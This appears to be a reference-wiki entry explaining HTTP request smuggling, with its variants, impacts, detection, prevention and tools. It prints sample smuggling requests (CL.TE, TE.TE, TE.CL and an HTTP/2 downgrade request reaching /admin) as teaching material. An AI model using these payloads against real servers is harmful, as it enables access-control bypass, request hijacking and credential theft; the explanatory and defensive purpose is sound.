HTTP Request Smuggling

HTTP Request Smuggling is a technique that exploits discrepancies in how front-end and back-end servers parse HTTP requests. By crafting ambiguous requests, attackers can "smuggle" a hidden request that gets interpreted differently by each server, bypassing security controls and poisoning other users' requests.

How It Works

HTTP provides two ways to specify request body length: Content-Length header and Transfer-Encoding: chunked. When both are present, servers may disagree on where one request ends and the next begins.

Classic Smuggling Variants

CL.TE (Content-Length vs Transfer-Encoding)

POST / HTTP/1.1
Host: vulnerable.com
Content-Length: 13
Transfer-Encoding: chunked

0

GSMUGGLED

Front-end uses Content-Length (13 bytes), back-end uses chunked encoding. "GSMUGGLED" becomes the start of the next request.

TE.CL (Transfer-Encoding vs Content-Length)

POST / HTTP/1.1
Host: vulnerable.com
Content-Length: 3
Transfer-Encoding: chunked

8
SMUGGLED
0

Front-end uses chunked, back-end uses Content-Length. The "SMUGGLED" portion prefixes the next user's request.

TE.TE (Transfer-Encoding obfuscation)

Transfer-Encoding: chunked
Transfer-Encoding: x
Transfer-Encoding: chunked
Transfer-encoding: cow

Different servers may process different variants of the header.

HTTP/2 Smuggling

# HTTP/2 to HTTP/1.1 downgrade smuggling
:method: POST
:path: /
content-length: 0

GET /admin HTTP/1.1
Host: internal

HTTP/2 front-end forwards to HTTP/1.1 back-end, enabling smuggled requests via header injection.

Attack Impact

  • Bypass security controls: WAF, access controls, IP restrictions
  • Request hijacking: Capture other users' requests/credentials
  • Cache poisoning: Store malicious responses for other users
  • Credential theft: Redirect users' authenticated requests
  • Web cache deception: Cache sensitive user data

Detection

# Timing-based detection
1. Send CL.TE probe with delay payload
2. If back-end waits for more data, vulnerable

# Response-based detection
1. Smuggle a request that causes distinct response
2. Check if subsequent request receives unexpected response

Prevention

  • Use HTTP/2 end-to-end (no downgrading)
  • Configure front-end to normalize ambiguous requests
  • Reject requests with both Content-Length and Transfer-Encoding
  • Use the same server software on front-end and back-end
  • Disable back-end connection reuse

Tools

  • smuggler - HTTP Request Smuggling scanner
  • Burp Suite's HTTP Request Smuggler extension

See Also